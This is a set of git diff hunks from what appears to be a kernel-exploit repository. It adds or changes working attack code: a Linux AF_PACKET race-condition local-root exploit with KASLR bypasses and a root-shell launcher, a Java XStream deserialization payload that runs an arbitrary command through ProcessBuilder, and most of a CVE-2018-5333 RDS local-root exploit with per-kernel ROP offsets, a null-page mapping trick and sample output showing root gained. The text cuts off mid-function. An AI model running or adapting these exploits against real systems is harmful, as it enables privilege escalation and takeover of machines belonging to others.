-    return r;
+    if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX)
+        return addr;
+
+    return 0;
 }

 unsigned long get_kernel_addr_syslog() {
@@ -699,9 +767,12 @@ unsigned long get_kernel_addr_syslog() {

    return addr;
 }
+#endif

 // * * * * * * * * * * * * * * kallsyms KASLR bypass * * * * * * * * * * * * * *
+// https://grsecurity.net/~spender/exploits/exploit.txt

+#if ENABLE_KASLR_BYPASS_KALLSYMS
 unsigned long get_kernel_addr_kallsyms() {
    FILE *f;
    unsigned long addr = 0;
@@ -713,7 +784,7 @@ unsigned long get_kernel_addr_kallsyms() {
    dprintf("[.] trying %s...\n", path);
    f = fopen(path, "r");
    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
+        dprintf("[-] open/read(%s): %m\n", path);
        return 0;
    }

@@ -734,58 +805,23 @@ unsigned long get_kernel_addr_kallsyms() {
    dprintf("[-] kernel base not found in %s\n", path);
    return 0;
 }
-
-// * * * * * * * * * * * * * * System.map KASLR bypass * * * * * * * * * * * * * *
-
-unsigned long get_kernel_addr_sysmap() {
-    FILE *f;
-    unsigned long addr = 0;
-    char path[512] = "/boot/System.map-";
-    char version[32];
-
-    struct utsname u;
-    u = get_kernel_version();
-    strcat(path, u.release);
-    dprintf("[.] trying %s...\n", path);
-    f = fopen(path, "r");
-    if (f == NULL) {
-        dprintf("[-] open/read(%s)\n", path);
-        return 0;
-    }
-
-    char dummy;
-    char sname[256];
-    char* name = "startup_64";
-    int ret = 0;
-    while (ret != EOF) {
-        ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, sname);
-        if (ret == 0) {
-            fscanf(f, "%s\n", sname);
-            continue;
-        }
-        if (!strcmp(name, sname)) {
-            fclose(f);
-            return addr;
-        }
-    }
-
-    fclose(f);
-    dprintf("[-] kernel base not found in %s\n", path);
-    return 0;
-}
+#endif

 // * * * * * * * * * * * * * * mincore KASLR bypass * * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1431

+#if ENABLE_KASLR_BYPASS_MINCORE
 unsigned long get_kernel_addr_mincore() {
-    unsigned char buf[getpagesize()/sizeof(unsigned char)];
+    unsigned char buf[getpagesize() / sizeof(unsigned char)];
    unsigned long iterations = 20000000;
    unsigned long addr = 0;

    dprintf("[.] trying mincore info leak...\n");
+
    /* A MAP_ANONYMOUS | MAP_HUGETLB mapping */
    if (mmap((void*)0x66000000, 0x20000000000, PROT_NONE,
-        MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
-        dprintf("[-] mmap()\n");
+          MAP_SHARED | MAP_ANONYMOUS | MAP_HUGETLB | MAP_NORESERVE, -1, 0) == MAP_FAILED) {
+        dprintf("[-] mmap(): %m\n");
        return 0;
    }

@@ -793,46 +829,50 @@ unsigned long get_kernel_addr_mincore() {
    for (i = 0; i <= iterations; i++) {
        /* Touch a mishandle with this type mapping */
        if (mincore((void*)0x86000000, 0x1000000, buf)) {
-            dprintf("[-] mincore()\n");
+            dprintf("[-] mincore(): %m\n");
            return 0;
        }

        int n;
-        for (n = 0; n < getpagesize()/sizeof(unsigned char); n++) {
+        for (n = 0; n < getpagesize() / sizeof(unsigned char); n++) {
            addr = *(unsigned long*)(&buf[n]);
            /* Kernel address space */
-            if (addr > 0xffffffff00000000) {
+            if (addr > KERNEL_BASE_MIN && addr < KERNEL_BASE_MAX) {
                addr &= 0xffffffffff000000ul;
                if (munmap((void*)0x66000000, 0x20000000000))
-                    dprintf("[-] munmap()\n");
+                    dprintf("[-] munmap(): %m\n");
                return addr;
            }
        }
    }

    if (munmap((void*)0x66000000, 0x20000000000))
-        dprintf("[-] munmap()\n");
+      dprintf("[-] munmap(): %m\n");

    dprintf("[-] kernel base not found in mincore info leak\n");
    return 0;
 }
+#endif

 // * * * * * * * * * * * * * * KASLR bypasses * * * * * * * * * * * * * * * *

 unsigned long get_kernel_addr() {
    unsigned long addr = 0;

+#if ENABLE_KASLR_BYPASS_KALLSYMS
    addr = get_kernel_addr_kallsyms();
    if (addr) return addr;
+#endif

-    addr = get_kernel_addr_sysmap();
-    if (addr) return addr;
-
+#if ENABLE_KASLR_BYPASS_SYSLOG
    addr = get_kernel_addr_syslog();
    if (addr) return addr;
+#endif

+#if ENABLE_KASLR_BYPASS_MINCORE
    addr = get_kernel_addr_mincore();
    if (addr) return addr;
+#endif

    dprintf("[-] KASLR bypass failed\n");
    exit(EXIT_FAILURE);
@@ -851,7 +891,7 @@ void launch_rootshell(void)
    fd = open(SYSCTL_PATH, O_WRONLY);

    if(fd == -1) {
-        dprintf("[-] could not open %s\n", SYSCTL_PATH);
+        dprintf("[-] open(%s): %m\n", SYSCTL_PATH);
        exit(EXIT_FAILURE);
    }

@@ -877,12 +917,12 @@ void launch_rootshell(void)

 void setup_sandbox() {
    if (unshare(CLONE_NEWUSER) != 0) {
-        dprintf("[-] unshare(CLONE_NEWUSER)\n");
+        dprintf("[-] unshare(CLONE_NEWUSER): %m\n");
        exit(EXIT_FAILURE);
    }

    if (unshare(CLONE_NEWNET) != 0) {
-        dprintf("[-] unshare(CLONE_NEWNET)\n");
+        dprintf("[-] unshare(CLONE_NEWNET): %m\n");
        exit(EXIT_FAILURE);
    }
 }
@@ -890,8 +930,6 @@ void setup_sandbox() {
 int main(int argc, char **argv)
 {
    int status, pid;
-    struct utsname u;
-    char buf[512], *f;

    if (getuid() == 0 && geteuid() == 0) {
        chown("/proc/self/exe", 0, 0);
@@ -908,11 +946,11 @@ int main(int argc, char **argv)

    dprintf("linux AF_PACKET race condition exploit by rebel\n");

-    dprintf("[.] starting\n");
-
-    dprintf("[.] checking hardware\n");
-    check_procs();
-    dprintf("[~] done, hardware looks good\n");
+#if ENABLE_SYSTEM_CHECKS
+    dprintf("[.] checking system\n");
+    check_env();
+    dprintf("[~] done, looks good\n");
+#endif

    dprintf("[.] checking kernel version\n");
    detect_versions();
@@ -0,0 +1,54 @@
+<map>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString>
+      <flags>0</flags>
+      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
+        <dataHandler>
+          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
+            <is class="javax.crypto.CipherInputStream">
+              <cipher class="javax.crypto.NullCipher">
+                <initialized>false</initialized>
+                <opmode>0</opmode>
+                <serviceIterator class="javax.imageio.spi.FilterIterator">
+                  <iter class="javax.imageio.spi.FilterIterator">
+                    <iter class="java.util.Collections$EmptyIterator"/>
+                    <next class="java.lang.ProcessBuilder">
+                      <command>
+                        <%=payload_cmd%>
+                      </command>
+                      <redirectErrorStream>false</redirectErrorStream>
+                    </next>
+                  </iter>
+                  <filter class="javax.imageio.ImageIO$ContainsFilter">
+                    <method>
+                      <class>java.lang.ProcessBuilder</class>
+                      <name>start</name>
+                      <parameter-types/>
+                    </method>
+                    <name>foo</name>
+                  </filter>
+                  <next class="string">foo</next>
+                </serviceIterator>
+                <lock/>
+              </cipher>
+              <input class="java.lang.ProcessBuilder$NullInputStream"/>
+              <ibuffer></ibuffer>
+              <done>false</done>
+              <ostart>0</ostart>
+              <ofinish>0</ofinish>
+              <closed>false</closed>
+            </is>
+            <consumed>false</consumed>
+          </dataSource>
+          <transferFlavors/>
+        </dataHandler>
+        <dataLen>0</dataLen>
+      </value>
+    </jdk.nashorn.internal.objects.NativeString>
+    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+  <entry>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
+  </entry>
+</map>
@@ -0,0 +1,883 @@
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
+// in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
+//
+// Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54
+//
+// The rds kernel module is not loaded by default on Ubuntu, and is blacklisted
+// in /etc/modprobe.d/blacklist-rare-network.conf to prevent autoloading.
+// - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
+// - load:    sudo insmod "/lib/modules/$(uname -r)/kernel/net/rds/rds.ko"
+//
+// This exploit is a modified extension of the original local root
+// proof of concept exploit written by wbowling as an example of using
+// CVE-2019-9213 to make previous kernel bugs exploitable:
+// - https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
+//
+// The original exploit is based on the null pointer dereference
+// reproducer proof of concept and analysis by 0x36:
+// - https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+//
+// wbowling has done most of the hard work, by utilising Jann Horn's
+// mmap_min_addr bypass technique (CVE-2019-9213), allowing userland to mmap
+// virtual address 0 (without which this bug would not be exploitable on
+// systems with a sufficiently large value for vm.mmap_min_addr);
+// and developing the appropriate ROP chain.
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+//
+// This exploit adds offsets for additional kernels, and introduces some
+// additional features, such as KASLR bypasses and system checks, including:
+// - check if system supports SMAP
+// - check if system supports RDS sockets
+// - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
+//   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+// - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
+//   - https://blog.lizzie.io/kaslr-and-perf.html
+//
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
+//
+// This exploit also uses various code patterns copied from:
+// - xairy's exploits:
+//   - https://github.com/xairy/kernel-exploits
+// - vnik's kernel ROP code:
+//   - https://github.com/vnik5287/kernel_rop
+// ---
+// $ gcc cve-2018-5333.c -o cve-2018-5333 -Wall
+// $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+// [.] checking kernel version...
+// [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
+// [~] done, version looks good
+// [.] checking system...
+// [~] done, looks good
+// [.] mapping null address...
+// [~] done, mapped null address
+// [.] KASLR bypass enabled, getting kernel base address
+// [.] trying /proc/kallsyms...
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying syslog...
+// [-] kernel base not found in syslog
+// [.] trying perf_event_open sampling...
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 0x402119...
+// [+] got root
+// # id
+// uid=0(root) gid=0(root) groups=0(root)
+// ---
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-5333
+// <bcoles@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/perf_event.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS  1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_PERF      1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
+
+// Can be overwritten by argv[1]
+char *SHELL = "/bin/sh";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+// kernel target struct, using ROP chain from wbowling's exploit
+struct kernel_info {
+  const char* kernel_version;
+  uint64_t commit_creds;
+  uint64_t prepare_kernel_cred;
+  uint64_t xor_rdi;     //: xor edi, edi ; ret
+  uint64_t mov_rdi_rax; //: mov rdi, rax ; pop rbx ; mov rax, rdi ; pop r12 ; pop rbp ; ret
+  uint64_t xchg_esp;    //: xchg eax, esp ; shr bl, 0xbf ; xor eax, eax ; pop rbp ; ret
+  uint64_t swapgs;      //: swapgs ; pop rbp ; ret
+  uint64_t iretq;       //: iretq
+};
+
+// Targets
+struct kernel_info kernels[] = {
+  { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
+  { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
+  { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
+  { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
+  { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  /* Untested:
+  { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
+  { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-66-generic #87-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-70-generic #91-Ubuntu",   0xa27b0, 0xa2ba0, 0x5d0c5, 0x179847, 0x4070c8, 0x64664, 0x406eb  },
+  { "4.4.0-79-generic #100-Ubuntu",  0xa2800, 0xa2bf0, 0x5d0c5, 0x179a67, 0x408338, 0x64664, 0x7d235  },
+  { "4.4.0-87-generic #110-Ubuntu",  0xa2860, 0xa2c50, 0x5d0c5, 0x179ca7, 0x408768, 0x64694, 0x7d285  },
+  { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
+  { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
+  { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
+  */
+
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
+  { "4.4.0-24-lowlatency #43-Ubuntu",   0xa32e0, 0xa36f0, 0x5e0c5, 0x17b5e7, 0x402958, 0x64d34, 0x7dadc },
+  { "4.4.0-28-lowlatency #47-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b8c7, 0x402f48, 0x64d34, 0x7dadc },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  //{ "4.4.0-34-lowlatency #53-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409088, 0x64d34, 0x7dadc },
+  { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  { "4.8.0-34-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  { "4.8.0-36-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  //{ "4.8.0-39-lowlatency #42~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-41-lowlatency #44~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-42-lowlatency #45~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447428, 0x649f4, 0x4b3e3 },
+  { "4.8.0-44-lowlatency #47~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-45-lowlatency #48~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-46-lowlatency #49~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-56-lowlatency #61~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477f8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
+};
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+// https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+
+#define RAND_SIZE 4096
+
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+#ifndef RDS_CMSG_MASKED_ATOMIC_CSWP
+#  define RDS_CMSG_MASKED_ATOMIC_CSWP 9
+#endif
+#ifndef AF_RDS
+#  define AF_RDS 0x15
+#endif
+
+void trigger_bug()
+{
+  struct sockaddr_in sin;
+  struct msghdr msg;
+  char buf[RAND_SIZE];
+  struct cmsghdr cmsg;
+
+  memset(&sin, 0, sizeof(struct sockaddr));
+  memset(&msg, 0, sizeof(msg));
+  memset(buf, 0x40, sizeof(buf));
+  memset(&cmsg, 0, sizeof(cmsg));
+
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): %m\n");
+    return;
+  }
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons(2000);
+  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+  bind(fd, (struct sockaddr*)&sin, sizeof(sin));
+
+  cmsg.cmsg_len = RAND_SIZE;
+  cmsg.cmsg_type = RDS_CMSG_MASKED_ATOMIC_CSWP;
+  cmsg.cmsg_level = SOL_RDS;
+
+  memcpy(&buf[0], &cmsg, sizeof(cmsg));
+
+  *(uint64_t *)(buf + 0x18) = 0x40404000; /* args->local_addr */
+
+  msg.msg_name = &sin;
+  msg.msg_namelen = sizeof(sin);
+  msg.msg_iov = NULL;
+  msg.msg_iovlen = 0;
+  msg.msg_control = buf;
+  msg.msg_controllen = RAND_SIZE;
+  msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
+
+  sendmsg(fd, &msg, 0);
+}
+
+// * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+
+void map_null() {
+  void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
+    MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (map == MAP_FAILED) {
+    dprintf("[-] mmap(null): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char* path = "/proc/self/mem";
+  int fd = open(path, O_RDWR);
+
+  if (fd == -1) {
+    dprintf("open(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long addr = (unsigned long)map;
+
+  while (addr != 0) {
+    addr -= 0x1000;
+    if (lseek(fd, addr, SEEK_SET) == -1) {
+      dprintf("lseek()\n");
+      exit(EXIT_FAILURE);
+    }
+    char cmd[1000];
+    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    system(cmd);
+  }
+}
+
+// * * * * * * * * * * * * * * * save state * * * * * * * * * * * * * * *
+// https://github.com/vnik5287/kernel_rop
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state() {
+  asm(
+  "movq %%cs, %0\n"
+  "movq %%ss, %1\n"
+  "pushfq\n"
+  "popq %2\n"
+  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
+}
+
+// * * * * * * * * * * * * * * SIGSEGV handler * * * * * * * * * * * * * *
+
+void handler(int signo, siginfo_t* info, void* vcontext) {}
+
+void debug_enable_sigsev_handler() {
+  struct sigaction action;
+  memset(&action, 0, sizeof(struct sigaction));
+  action.sa_flags = SA_SIGINFO;
+  action.sa_sigaction = handler;
+  sigaction(SIGSEGV, &action, NULL);
+}
+
+// * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+static int check_env() {
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): RDS kernel module not loaded?\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char buffer[PROC_CPUINFO_LENGTH];
+  char* path = "/proc/cpuinfo";
+  int length = read_file(path, &buffer[0], PROC_CPUINFO_LENGTH);
+  if (length == -1) {
+    dprintf("[-] open/read(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  char* found = memmem(&buffer[0], length, "smap", 4);
+  if (found != NULL) {
+    dprintf("[-] SMAP detected, no bypass available\n");
+    exit(EXIT_FAILURE);
+  }
+
+  struct stat st;
+
+  if (stat("/dev/grsec", &st) == 0) {
+    dprintf("[!] Warning: grsec is in use\n");
